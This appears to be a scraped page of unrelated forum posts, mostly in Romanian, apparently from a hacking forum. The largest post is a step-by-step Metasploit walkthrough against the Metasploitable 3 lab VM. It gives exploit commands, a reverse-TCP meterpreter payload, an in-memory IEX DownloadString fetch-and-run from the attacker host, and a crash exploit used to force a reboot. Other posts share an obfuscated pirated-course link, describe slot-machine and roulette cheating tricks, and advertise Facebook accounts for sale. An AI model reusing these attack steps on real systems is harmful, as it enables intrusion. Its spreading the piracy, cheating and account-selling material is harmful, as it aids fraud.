Leaderboard

Hi, If anyone needs the entire collection here is the link: aHR0cHM6Ly9tZWdhLm56LyMhQjNoU0ZBUUEhRjRwMFZWYU9qM2hrRy1Ub1NVQ2FzemNZeGw2S2ZsbVB2eHQ2R0M0cTRmOA== PS: I agree with what Nytro said. The only reason for posting the entire collection is that I want to help the community and specially the ones that cannot afford the money yet. I am posting the link for a definite amount of time and then it will disappear. The link is base64 for those who do not know. By the way, Vivek`s English is ok (believe me, others are far worst at English than he is). Fave fun!

Nu va fi o zi de maine pentru tine aici. O seara buna si tie. Ban permanent.

The current Android sensor security model either allows only restrictive read access to sensitive sensors (e.g., an app can only read its own touch data) or requires special installtime permissions (e.g., to read microphone, camera, or GPS). Moreover, Android does not allow write access to any of the sensors. Sensing-based security and non-security applications, therefore, crucially rely upon the sanity of the Android sensor security model. In this paper, we show that such a model can be effectively circumvented. Specifically, we build SMASheD, a legitimate framework under the current Android ecosystem that can be used to stealthily sniff as well as manipulate many of the Android’s restricted sensors (even touch input). SMASheD exploits the Android debug bridge functionality and enables a malicious app with only the INTERNET permission to read, and write to, multiple different sensor data files at will. SMASheD is the first framework, to the best of our knowledge, that can sniff and manipulate protected sensors on unrooted Android devices, without user awareness, without constant device-PC connection and without the need to infect the PC. Download: https://we.tl/mfoEtoz63x

Video Download Test it in VM !!!

Nu iti folosesc la nimic 5000 de idioti care posteaza poze cu pisici si ei au 50 de ani, fac laba si ragaie de bere. Iti trebuie pe nise. Ai 5000 de prieteni care sunt jucatori la Forex ? Da, atunci ai la ce sa-i folosesti. Spre exemplu eu am adunat ~2000 doar jucatori de poker (+/- alte jocuri de noroc. E foarte greu sa bagi 5000 doar dintr-o nisa, dureaza mult mai mult de 3 luni, plus ca unii te mai si reclama si trebuie sa-i recunosti pe toti care sunt ca iti da poze cu ei, altfel iti sterge contul dupa o perioada. Asa sunt si grupuri pe facebook unde rolul este sa te bage altii in lista, ceva de gen add-me.

Max frate, puteți încărca IOS Pentesting, analiza fișier Log, Pentesting lumea reală, Powershell cursuri de academie pentester pe mega. Multe mulțumiri în avans Hi brother, Can you please upload IOS Pentesting, Log file analysis, Real world pentesting, Poweshell courses of pentesteracademy on mega. Many many thanks in advance

Step by step Metasploit walkthrough Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine. I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and more than often, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user. Let's go. Step 1: Reconaissance Before actually hacking your way in, you need to find more information about your target. You have to find out the ip adress, running services and possible vulnerable services to choose your attack vector. Let's start with a simple netdiscover scan to find the IP adress of our target. To do so, just type netdiscover in your terminal. I know 192.168.0.149 is my own adress, so the ip adress of my host should be 192.168.0.206. Note: as I wrote this blogpost over a longer period, the used ip addresses later in this blogpost of the target machine can vary from 192.168.0.205 to 192.168.0.206 Let's continue with an Nmap scan to find running services: nmap -sV 192.168.0.206 Copy We find an Apache webserver running on port 8022. Let's look into that. Open firefox and enter the IP adress + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick google search learns us there is an exploit available! Bingo! Step 2: exploit a service to get a shell Now we have identified a vulnerable service and an available exploit, it's start to exploit the machine: Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering: search ManageEngine Copy After executing the search command, we find the Manage Engine Desktop Central 9 exploit we've found via google. To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete. use exploit/windows/http//manageengine_connectionid_write Copy Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here: RHOST: the target address. This will be the IP address of our target host - 192.168.0.206 RPORT: the target port. During our Nmap portscan, we found the service running on 8022. TARGETURI : the path for the Desktop Central software. Leave this is the standard setting. To set your own settings, you need to execute set SETTING value, e.g.: set RHOST 192.168.0.206 Copy set RPORT 8022 Copy Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage. Now we have setup the exploit, we need to attach a payload to it. Usually, our payload is spawning a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will setup a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a windows command line or a Windows powershell. A very interesting payload is meterpreteter one because it is capable of so much more of simpy spawning a shell. Meterpreter is an advanced multi-function payload that is superior to other payloads because in contrast to other payloads that execute one command (such as adding a user or spawning a shell), meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, installing backdoor, privilege escalation and so on. Another significant advantage is that meterpeter fully resides in the memory by using DLL injection in existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes which would be easily picked up by Antiviruses or Itrusion Detection Systems. To attach a meterpreter payload to our exploit, use the following command: set payload windows/meterpreter/reverse_tcp Copy If you run show options again now, you will see that Payloads options are visible now: LHOST: the host where the meterpreter will connect back to. This will be the address of our own Kali VM 192.168.0.241 LHOST: the port where the meterpreter will connect back to. Choose any available port you like or leave it on 4444. Set our listen adress to our own address: set LHOST 192.168.0.241 Copy We're set to fire the exploit. Simply type: exploit Copy As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower privilege shell. Because we only have a lower privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are number of options available, but always try the easy way first. Execute getsystem to try Meterpreter to execute a few tricks in its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case Windows Command Line), just type shell. A very powerful Windows privilege escalation framework is Powersploit, written in Powershell. We downloaded and extracted the zip file on our Desktop in a folder Powersploit. We will start a web server with PowerShell, so we can easily call them via our meterpreter shell. Navigate to the unzipped folder and start a web server via the following command: We're set to fire the exploit. Simply type: python -m SimpleHTTPServer Copy Let's return to our Meterpreter session. It is possible to spawn a Powershell shell within Meterpreter but it's far easier to load scripts such as Powersploit if you immediately spawn a reverse PowerShell with the payload. To do so, we will exit the meterpreter session and add a PowerShell payload instead of a meterpreter payload to our exploit by entering the command below. Quickly check show options to verify if the listen address is still correct. set payload windows/powershell_reverse_tcp Copy And we have a PowerShell session! You can ignore the Invoke-Expression errors. This is where it gets a bit more advanced. We can not just download Powersploit to our target system, as this will more than likely raise red flags by Antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in the memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework. To download the script in the memory, execute the following command in PowerShell: IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.241:8000/Privesc/PowerUp.ps1") Copy Next, we execute a function from the scripts called Invoke-AllChecks, which will check the target host for attack vectors for privilege escalation. To make it easier to read, we will output the result to a file named allchecks.txt Invoke-AllChecks | Out-File allchecks.txt Copy To check-out the results, open a new terminal and launch a new instance of Metasploit and get the meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port as we are already using 4444 in our PowerShell session (see left terminal window on the screenshot below). Now we have two shells running on the same target host, a PowerShell and a meterpreter shell. To download the all-checks.txt file, execute download allchecks.txt with meterpreter. Download a copy of the allchecks.txt here. As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted servicepaths, hackable DLL locations, unattended install files, etc.. Let's focus on these unquoted servicepaths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added to. As services are run by the system user, this would mean that our custom command also is executed as system user. Nice! The catch however is that you also need improperly configured write access rights to these services to add your custom command. PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. By example, for abusing the service Jenkins, we would need to execute the following command: Install-ServiceBinary -Name 'jenkins'. Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights. Maybe PowerSploit didn't catch all unquoted servicepaths. Let's check manually in our open meterpreter shell. First get a Windows Command Line by executing shell. Execute the following command: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Copy Using this method, we find 4 possible vulnerable services. One of these services, OpenSSHd was not in the list of PowerSploit. Let's try to exploit this service. Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the Readme of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group. Install-ServiceBinary -Name 'OpenSSHd' Copy Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified if the user John was added, but no luck. There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks to force a reboot. We found a vulnerability to the MS12-020 bug, exploited by CVE-2012-0002. Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and and execute it. This exploits sends a sequence of specially crafted RDP packets to an affected system causing it to crash and reboot. (make sure to watch your Metasploitable 3 VM when launching this exploit) Your active Windows Command Line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the meterpreter shell. Spawn a Windows Command Line by executing shell and check with net users if our exploit worked. It worked! We have created a new user named John, which is part of the Administrators group. We know from the PowerSploit Readme that his password is Password123!. Next step is to actually login with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details. Another cool trick is spawning a remote Desktop. Could be very usefull for enumeration of the box or disabling firewall (rules) if the PSExec should not work. Sursa: https://www.zero-day.io/metasploitwalkthrough/

O aplicaţie realizată de IT-iștii din Cluj, folosită de către NASA pe Staţia Spaţială Internaţională Mai mulţi IT-işti clujeni, dezvoltatori ai unei aplicaţii de back-up, au ajuns cu produsul lor chiar pe Staţia Spaţială Internaţională, după ce americanii de la NASA au cumpărat 20 de licenţe ale soft-ului lor, aflat în prezent deja la a şasea versiune, cu vânzări pe întreg mapamondul, scrie News.ro. NASA a achiziţionat 20 de licenţe ale soft-ului Backup4all, o aplicaţie dezvoltată de o echipă de programatori clujeni care deţin compania Softland. Începând cu luna mai, aplicaţia este folosită pe Staţia Spaţială Internaţională pentru activităţile de backup realizate de către agenţie. O licenţă pentru această aplicaţie costă 49,99 dolari, dar pentru că NASA a cumpărat o cantitate mai mare de licenţă, a primit şi o reducere, astfel încât preţul total a fost de 770 de dolari. De asemenea, pentru că este folosită într-un mediu în care nu există conexiune la internet, aplicaţia a trebuit modificată. "În ianuarie anul acesta am primit un mail de la NASA în care ne spuneau că şi-ar dori să instaleze Backup4all într-un mediu foarte securizat, fără acces la internet. Ne-au explicat că modalitatea noastră de activare nu va funcţiona în environment-ul lor şi atunci am aflat că vor să instaleze aplicaţia pe Staţia Spaţială Internaţională. A urmat o lună întreagă de teste şi configuraţii pentru ceea ce aveau nevoie şi în 31 mai a început să fie utilizată. Astfel, acum rulează pe opt laptopuri de pe Staţia Spaţială Internaţională”, a explicat Lóránt Barla, din partea companiei Softland. Clujenii, care au ajuns cu Backup4all la a şasea versiune, au explicat că mai ţin legătura cu cei de la NASA, în cazul în care aceştia au nevoie de ajutor pe partea de suport. "Cei de la NASA au cumpărat aplicaţia de pe site-ul nostru ca orice client normal. Nici măcar nu am ştiut. Poate mai avem şi alţi clienţi la fel de importanţi, dar nu ştim. Ar fi avut şi alte opţiuni pentru că este destul de mare concurenţa pe partea de backup. De ce au ales aplicaţia noastră? Pentru că li s-a părut că este cea mai bună soluţie pe care o pot configura conform nevoilor lor. În ceea ce îi priveşte pe clienţii noştri de la NASA, mai comunicăm profesional cu ei şi dacă vor avea nevoie de suport, pot conta pe ajutorul nostru. Dar, de regulă, Backup4all se configurează şi îşi face back-up automat fără să fie nevoie de altă interacţiune cu dezvoltatorii”, a precizat Lóránt Barla. Ca firmă, Softland funcţionează din 1999, la început desfăşurând activităţi de outsourcing. Din 2002 însă, echipa s-a concentrat să dezvolte şi să vândă propriile programe. În prezent, Softland are 13 angajaţi care se ocupă inclusiv de marketing, relaţia cu clienţii şi vânzări. Sursa: http://www.digi24.ro/stiri/externe/o-aplicatie-realizata-de-it-istii-din-cluj-folosita-de-catre-nasa-pe-statia-spatiala-internationala-737922

Publicat pe 3 mai 2017 We take a look into the malware Gatak which uses WriteProcessMemory and CreateRemoteThread to inject code into rundll32.exe. Many thanks to @_jsoo_ for providing the sample! Follow me on Twitter: https://twitter.com/struppigel Gatak VirusBtn article: https://www.virusbulletin.com/virusbu... Sample: https://www.hybrid-analysis.com/sampl... API Monitor: http://www.rohitab.com/apimonitor Process Explorer: https://technet.microsoft.com/en-us/s... x64dbg: http://x64dbg.com/ HxD: https://mh-nexus.de/en/hxd/

Tin sa te contrazic. La pacanele normal "prin lege" daca ai o sala de jocuri care are mai mult de 5 masinute gen casa de pariuri esti obligat sa mergi pe un procentaj de 60% castig client 40% sala de jocuri iar daca esti declarat casino ai obligatia de a merge cu 70% castig client iar 30% tu, smecheria a mare la masinute este acel jackpot la care se uita toata lumea dar nimeni nu intelege ca defapt ala e ghimpele, pentru ca jackpot-ul sa merga si sa creasca atunci toate masinutele trebuie legate la el iar urma de procentaj se pierde intre ele eu pot sa bag la masinuta nr 3 spre exemplu 10 milioane iar tu de la masinuta 5 sa castigi si atunci tu te intrebi de ce nu imi dadu masinuta 7 milioane inapoi ca asa are procentaju de 70% pai nu ti-l dadu pentru ca sunt legate intre ele iar urma de procentaj se pierde intre ele, cat despre smecheri au fost destule la jocul respectiv cu "capsuni" daca in momentul in care iti dadea 3 capusi pe ecran aveai telefonul in laterala masinutei langa difuzor iar langa difuzor este un sensor aveai o probabilitate de 90% sa iti dea prejunigi maxime adica 15 cat era atunci ! Ca sa numai zic de cele din occident in care apasai pe buton sa pice bani si defapt tu puteai sa ai un euro in "casa" daca aveai o ruleta de 1 metru data in 3 adica 3.33 de centimetri fiecare + lipite una peste alta si date cu banda izoliera neagra si puteai sa bagi ruleta respectiva pe gaura aia si apasai pe buton sa iti dea euro respectiv afara atunci masinuta numai stia cati bani ai tu in casa pentru ca tu bruiai defapt cititorul iar masinuta stia ca trebuie sa iti dea bani dar nu stia cat si de regula iti dadea primele doua cuti adica cea cu 5-10-20 de centi si cea dea doua cu 50 de centi respectiv 1 euro. Si multe altele. Cat despre ruleta si aici au fost multe smecheri (procentajele nu le stiu si nu le prespun ca nu sunt informat despre asta.) Dar majoritatea au tinut defapt de un mic blat. Cea cu magnetul pus deasupra pe geam exact in mijloc cand jucai seria mica, si pus pe partea opusa a bilei in momentul plecari. Cea cu telefonul pe vibratii lipit casuta unde se deschise sa se citeasca ruleta. A mai existat un bug in care daca jucai rosie/neagra si indiferent de rezultat pana sa spuna ruleta rosu sau negru trebuia sa apezi repede pe re-bet (acelasi pariu) si iti dubla suma (aceasta smecheria a mers in perioada 2011-2013 la ruletele de tip R.Franco) Deci smecherii sunt si inca exista. Sfatul meu este sa nu joci, iar daca joci trebuie sa te duci la un casino gen maxbet gen milion in care nu sta nimeni sa te jegmaneasca de 3-4-5 milioane ca oamenii fac poate suta de mii la zi !

Pe redhat majoritatea subdomeniilor daca nu erai logat si intrai pe o pagina unde necesita logarea redirect ul se facea prin service-now care avea un parametru prin GET vulnerabil. Nu am mai gasit poza exacta, am facut o poza dupa video ul de poc. La sap.com la.fel era un XSS prin GET, postez poza diseară cand ajung. Ambele raportate, rezolvate si ca recompensa am luat hof pe ambele. La redhat m au pus sa aleg in care vreau la service now sau redhat😂

[h=2]DSploit Android Toolkit for Security Testing[/h]April 20th, 2014 Mourad Ben Lakhoua dSploit is a very comfortable tool that you can install on Android to run a pentest or network security assessment. The toolkit allows fingerprinting the remote operating systems and identifying different hosts, scans the network for system vulnerabilities and performing MITM to sniff sensitive information such as user’s password. The features included in dSploit are: WiFi Scanning & Common Router Key Cracking Deep Inspection Vulnerability Search Multi Protocol Login Cracker Packet Forging with Wake On Lan Support HTTPS/SSL Support ( SSL Stripping + HTTPS -> Redirection ) MITM Real-time Network Stats MITM Multi Protocol Password Sniffing MITM HTTP/HTTPS Session Hijacking MITM HTTP/HTTPS Hijacked Session File Persistence MITM HTTP/HTTPS Real-time Manipulation MITM module screenshot from dSploit (click to enlarge) The toolkit will help security officer or penetration tester to demonstrate how it is possible to exploit vulnerabilities and take control on targeted systems. The team have officially announced that they have a new nightly builds that you can download over this link: http://update.dsploit.net/nightly

[h=3]Fern Wifi Cracker 1.45 Released with Cookie Hijacker[/h] Fern Cookie Hijacker is a new feature add in Fern Wifi Cracker 1.45 ,it is a wifi based session hijacking tool able to clone remote online web sessions by sniffing and capturing wireless cookie packets from remote hosts by intercepting reachable wireless signals. It is capable of decrypting WEP encrypted packets on the fly to process session cookies transmitted over the air. Fern cookie Hijacker comes with smart intergrated code to detect and intercept cookie packets, unlike some cookie detection engines fern cookie hijacker does not wait to collect complete cookie acknowledgement during the initial authentication process, but pulls cookies and associate them with their hosts as they are transmitted over the wireless connection, its also forges to correctness values that are not captured e.g (exipry,isSecure). Download Fern Wifi Cracker 1.45 Sursa: Fern Wifi Cracker 1.45 Released with Cookie Hijacker | Tools Yard - The Hacker News

Folosesc eBay la ordinea zilei, amazon rareori. Ce te impiedica sa faci comanda?

OK, vezi ca ai facut triplu post. Hai sa nu mai facem spam in topicul omului. Daca o sa fie interesat, banuiesc ca o sa te contacteze nu? Engleza ta e de balta statuta, pune-te la punct daca stai in UK si n-o mai arde numai printre romani.

Salut. Vand conturi de facebook 5000 prieteni Conturile cu vechime mai mica de 3 luni costa. 5000 prieteni-10 euro. Conturi cu vechime mai mare de 3 luni. 5000 prieteni- 15 euro. Prietenii sunt romani. Cine doreste sa-mi dea mesaj.

Are reputatie -16 ... la ce va asteptati ?